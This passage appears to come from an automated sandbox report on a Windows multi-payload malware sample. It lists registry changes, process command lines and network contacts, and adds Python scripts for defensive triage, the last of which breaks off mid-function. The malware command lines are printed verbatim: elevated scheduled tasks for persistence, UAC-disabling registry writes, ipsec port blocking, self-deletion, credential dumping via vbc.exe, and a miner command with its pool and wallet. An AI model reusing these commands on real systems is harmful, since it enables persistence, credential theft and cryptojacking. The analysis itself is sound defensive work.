| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00a2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadDecision = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325} | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadDecisionReason = "1" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadNetworkName = "Network 3" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadDecisionTime = d02dbac68046db01 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a\WpadDecisionTime = d02dbac68046db01 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a\WpadDecision = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\SysWOW64\svchost.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\ProgramData\Start Menu\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\ProgramData\Start Menu\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\ProgramData\Start Menu\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Uses Task Scheduler COM API
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe
"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"
C:\Users\Admin\AppData\Roaming\healastounding.exe
"C:\Users\Admin\AppData\Roaming\healastounding.exe"
C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
"C:\Users\Admin\AppData\Roaming\Pluto Panel.exe"
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Users\Admin\AppData\Roaming\test.exe
"C:\Users\Admin\AppData\Roaming\test.exe"
C:\Users\Admin\AppData\Roaming\22.exe
"C:\Users\Admin\AppData\Roaming\22.exe"
C:\Users\Admin\AppData\Roaming\gay.exe
"C:\Users\Admin\AppData\Roaming\gay.exe"
C:\Users\Admin\AppData\Roaming\___11.19.exe
"C:\Users\Admin\AppData\Roaming\___11.19.exe"
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Users\Admin\AppData\Roaming\Opus.exe
"C:\Users\Admin\AppData\Roaming\Opus.exe"
C:\Users\Admin\AppData\Roaming\aaa.exe
"C:\Users\Admin\AppData\Roaming\aaa.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\\svchost.exe
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
C:\Users\Admin\AppData\Roaming\4.exe
"C:\Users\Admin\AppData\Roaming\4.exe"
C:\Users\Admin\AppData\Roaming\a.exe
"C:\Users\Admin\AppData\Roaming\a.exe"
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Block
C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -auto
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -acsi
C:\Users\Admin\AppData\Local\Temp\svchos.exe
C:\Users\Admin\AppData\Local\Temp\\svchos.exe
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "ISS Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmpAA91.tmp"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Users\Admin\AppData\Roaming\mediaget.exe
"C:\Users\Admin\AppData\Roaming\mediaget.exe"
C:\Windows\SysWOW64\PING.EXE
ping -n 2 127.0.0.1
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Filter1
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "ISS Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpC5B0.tmp"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "0fd7de5367376231a788872005d7ed4f" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\0fd7de5367376231a788872005d7ed4f.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1420090574490970998-1514513884419101326-171104240-183127650733380225-1896207397"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\KBDVNTC\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "a" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb\a.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TXPlatforn" /sc ONLOGON /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\TXPlatforn.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\ProgramData\Start Menu\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Documents and Settings\taskhost.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ckwNq3q2sC.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe
C:\Windows\system32\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe "c:\windows\system32\259437400.txt",MainThread
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=FilteraAtion1 action=block
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
C:\ProgramData\Start Menu\dllhost.exe
"C:\ProgramData\Start Menu\dllhost.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Block assign=y
C:\Windows\Help\Winlogon.exe
C:\Windows\Help\Winlogon.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Roaming\22.exe"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 216
C:\Windows\Cursors\WUDFhosts.exe
C:\Windows\Cursors\WUDFhosts.exe -o pool.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S -p x
C:\Users\Admin\AppData\Roaming\aaa.exe
"C:\Users\Admin\AppData\Roaming\aaa.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3048 -s 804
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\259457134.bat" "C:\Users\Admin\AppData\Roaming\aaa.exe" "
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
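The process list above is easier to read once the command lines are replayed rather than eyeballed. The netsh ipsec chain, for example, only bites once `set policy ... assign=y` runs, and what it bites is inbound 135/139/445 on both TCP and UDP: the host locks its own RPC/NetBIOS/SMB doors behind it, the same sequence (down to the `FilteraAtion1` typo) that is publicly documented for PurpleFox droppers, which the sandbox also flags here. The `svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"` lines and the matching `.exe` name are not corruption on the page: they are GBK bytes rendered through the en-US sandbox's code page, and they decode to 主动防御服务模块 ("Active Defense Service Module"). The script below is an added example, not part of the sandbox report; its input is a constructed list of command lines copied verbatim from the Processes section, and the function names are the author's own.

```python
"""Re-parse the command lines in the Processes section above (added example,
not part of the sandbox report): replay the netsh ipsec chain, list elevated
logon tasks, extract the miner's pool and wallet, spot self-deletion stubs,
and decode the mojibake svchost service-group name."""
import re

# Constructed sample: command lines copied verbatim from the Processes section.
SAMPLE_CMDLINES = r'''
netsh ipsec static add policy name=Block
netsh ipsec static add filterlist name=Filter1
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
netsh ipsec static add filteraction name=FilteraAtion1 action=block
netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
netsh ipsec static set policy name=Block assign=y
"schtasks.exe" /create /f /tn "ISS Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmpAA91.tmp"
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\KBDVNTC\lsass.exe'" /rl HIGHEST /f
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\ProgramData\Start Menu\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul
C:\Windows\Cursors\WUDFhosts.exe -o pool.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S -p x
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
'''.strip().splitlines()


def tokens(cmd):
    """Split a Windows command line on whitespace, keeping quoted arguments whole."""
    return [t.strip('"\'') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def ipsec_blocked_ports(cmdlines):
    """Replay `netsh ipsec static` and return {(dstport, proto)} blocked by an *assigned* policy."""
    filterlists, actions, rules, assigned = {}, {}, [], set()
    for cmd in cmdlines:
        t = tokens(cmd)
        if t[:3] != ['netsh', 'ipsec', 'static'] or len(t) < 5:
            continue
        verb, obj = t[3].lower(), t[4].lower()
        a = dict(x.split('=', 1) for x in t[5:] if '=' in x)   # key=value arguments
        if (verb, obj) == ('add', 'filter'):
            filterlists.setdefault(a['filterlist'], []).append((int(a['dstport']), a['protocol'].upper()))
        elif (verb, obj) == ('add', 'filteraction'):
            actions[a['name']] = a['action'].lower()
        elif (verb, obj) == ('add', 'rule'):
            rules.append((a['policy'], a['filterlist'], a['filteraction']))
        elif (verb, obj) == ('set', 'policy') and a.get('assign', '').lower() == 'y':
            assigned.add(a['name'])
    # A rule only takes effect if its policy is assigned and its action is block.
    return {f for pol, fl, fa in rules if pol in assigned and actions.get(fa) == 'block'
            for f in filterlists.get(fl, [])}


def scheduled_tasks(cmdlines):
    """One dict per `schtasks /create`: task name, trigger, run level, command or XML."""
    found = []
    for cmd in cmdlines:
        t = tokens(cmd)
        low = [x.lower() for x in t]
        if not low or not low[0].endswith('schtasks.exe') or '/create' not in low:
            continue
        opt = lambda flag: t[low.index(flag) + 1] if flag in low[:-1] else None
        found.append({'name': opt('/tn'), 'trigger': opt('/sc'), 'run_level': opt('/rl'),
                      'command': opt('/tr'), 'xml': opt('/xml')})
    return found


def elevated_logon_tasks(cmdlines):
    """Tasks registered to start at every logon with the highest run level."""
    return [x for x in scheduled_tasks(cmdlines) if (x['run_level'] or '').upper() == 'HIGHEST'
            and (x['trigger'] or '').upper() == 'ONLOGON']


def miner_config(cmdlines):
    """Pool and wallet from an xmrig-style `-o pool -u wallet` command line, or None."""
    for cmd in cmdlines:
        t = tokens(cmd)
        if '-o' in t[:-1] and '-u' in t[:-1]:
            return {'binary': t[0], 'pool': t[t.index('-o') + 1],
                    'wallet': t[t.index('-u') + 1]}
    return None


SELF_DELETE_RE = re.compile(r'ping\s+-n\s+\d+\s+127\.0\.0\.1.*?&&\s*del\s+(\S+)', re.I)


def self_delete_targets(cmdlines):
    """Files removed by the ping-as-sleep-then-del stub a dropper uses to cover its tracks."""
    return [m.group(1) for m in map(SELF_DELETE_RE.search, cmdlines) if m]


def decode_gbk_mojibake(s):
    """Undo GBK bytes shown through a Latin-1 code page; unchanged input if it is not mojibake."""
    try:
        return s.encode('latin-1').decode('gbk')
    except UnicodeError:
        return s


def svchost_groups(cmdlines):
    """(as shown, decoded) service-group names passed to `svchost.exe -k`."""
    pairs = []
    for t in map(tokens, cmdlines):
        if t and t[0].lower().endswith('svchost.exe') and '-k' in t[:-1]:
            pairs.append((t[t.index('-k') + 1], decode_gbk_mojibake(t[t.index('-k') + 1])))
    return pairs
```

Run it over the full list from the report rather than the sample and the seven `/rl HIGHEST` logon tasks stand out: system-process names (lsass, dllhost, taskhost, sppsvc) registered from directories where those binaries never live.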
Network
| Country | Destination | Domain | Proto |
| MD | 194.180.174.53:80 | | tcp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | pretorian.ac.ug | udp |
| MD | 194.180.174.53:80 | | tcp |
| CN | 59.56.110.231:8898 | | tcp |
| US | 8.8.8.8:53 | prepepe.ac.ug | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | gfhhjgh.duckdns.org | udp |
| RU | 80.87.192.115:80 | | tcp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| US | 8.8.8.8:53 | yabynennet.xyz | udp |
| US | 104.155.138.21:81 | yabynennet.xyz | tcp |
| US | 8.8.8.8:53 | pretorian.ac.ug | udp |
| US | 8.8.8.8:53 | whatismyipaddress.com | udp |
| HU | 91.219.236.18:80 | 91.219.236.18 | tcp |
| US | 104.19.222.79:80 | whatismyipaddress.com | tcp |
| US | 104.19.222.79:443 | whatismyipaddress.com | tcp |
| CA | 172.98.92.42:58491 | | tcp |
| US | 104.19.222.79:443 | whatismyipaddress.com | tcp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| MD | 194.180.174.41:80 | | tcp |
| RU | 92.63.107.12:80 | | tcp |
| MD | 194.180.174.41:80 | | tcp |
| US | 8.8.8.8:53 | 22ssh.com | udp |
| HU | 91.219.236.148:80 | | tcp |
| US | 8.8.8.8:53 | pool.usa-138.com | udp |
| SG | 45.77.45.115:80 | pool.usa-138.com | tcp |
| HU | 91.219.236.148:80 | | tcp |
| CA | 172.98.92.42:58491 | | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| RU | 80.87.192.115:80 | | tcp |
| RU | 92.63.107.12:80 | | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | files.000webhost.com | udp |
| CA | 172.98.92.42:58491 | | tcp |
| RU | 80.87.192.115:80 | | tcp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| N/A | 127.0.0.1:58491 | | tcp |
| N/A | 127.0.0.1:58491 | | tcp |
| RU | 80.87.192.115:80 | | tcp |
| N/A | 127.0.0.1:58491 | | tcp |
| CA | 172.98.92.42:58491 | | tcp |
| US | 8.8.8.8:53 | gfhhjgh.duckdns.org | udp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| RU | 80.87.192.115:80 | | tcp |
| CA | 172.98.92.42:58491 | | tcp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| CA | 172.98.92.42:58491 | | tcp |
| RU | 80.87.192.115:80 | | tcp |
| N/A | 127.0.0.1:58491 | | tcp |
| N/A | 127.0.0.1:58491 | | tcp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| RU | 80.87.192.115:80 | | tcp |
| N/A | 127.0.0.1:58491 | | tcp |
| CA | 172.98.92.42:58491 | | tcp |
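The network table mixes DNS lookups, C2 connections, IP-echo checks and the miner's pool in one flat list. A responder wants the same rows grouped differently: which names were looked up, what each resolved to, which hosts are reached on odd ports, and which names belong to free dynamic-DNS providers (duckdns.org, hopto.org, f3322.net), the usual choice for RAT operators who cannot hold a stable IP. The script below is an added example, not part of the sandbox report. Its input is a constructed subset of the rows above, including one row in the raw report's misaligned layout (protocol in the Domain column) so the parser copes with both; the DDNS and IP-echo lists are the author's reference lists, the pool name is taken from the miner command line in the Processes section, and the "port shared with loopback" tag is a heuristic, not a sandbox signature.

```python
"""Triage the Network table above (added example, not part of the sandbox
report): parse rows, separate DNS lookups from connections, map domains to
the addresses they resolved to, and tag destinations worth looking at first."""
import ipaddress
from collections import defaultdict

# Constructed sample: a subset of rows from the Network table. The 172.98.92.42
# row keeps the raw report's misaligned layout on purpose.
SAMPLE_ROWS = """
| MD | 194.180.174.53:80 | | tcp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| CN | 59.56.110.231:8898 | | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | gfhhjgh.duckdns.org | udp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| US | 104.155.138.21:81 | yabynennet.xyz | tcp |
| CA | 172.98.92.42:58491 | tcp | |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| SG | 45.77.45.115:80 | pool.usa-138.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| N/A | 127.0.0.1:58491 | | tcp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
""".strip().splitlines()

# Assumed reference lists (the author's, not the report's): free dynamic-DNS
# providers and public "what is my IP" services.
DDNS_SUFFIXES = ('.duckdns.org', '.hopto.org', '.f3322.net')
IP_ECHO = {'api.ipify.org', 'whatismyipaddress.com'}


def parse_row(line):
    """One table row -> dict. Tolerates both column layouts used in the report."""
    cells = [c.strip() for c in line.strip().strip('|').split('|')]
    cells += [''] * (4 - len(cells))
    country, dest, domain, proto = cells[:4]
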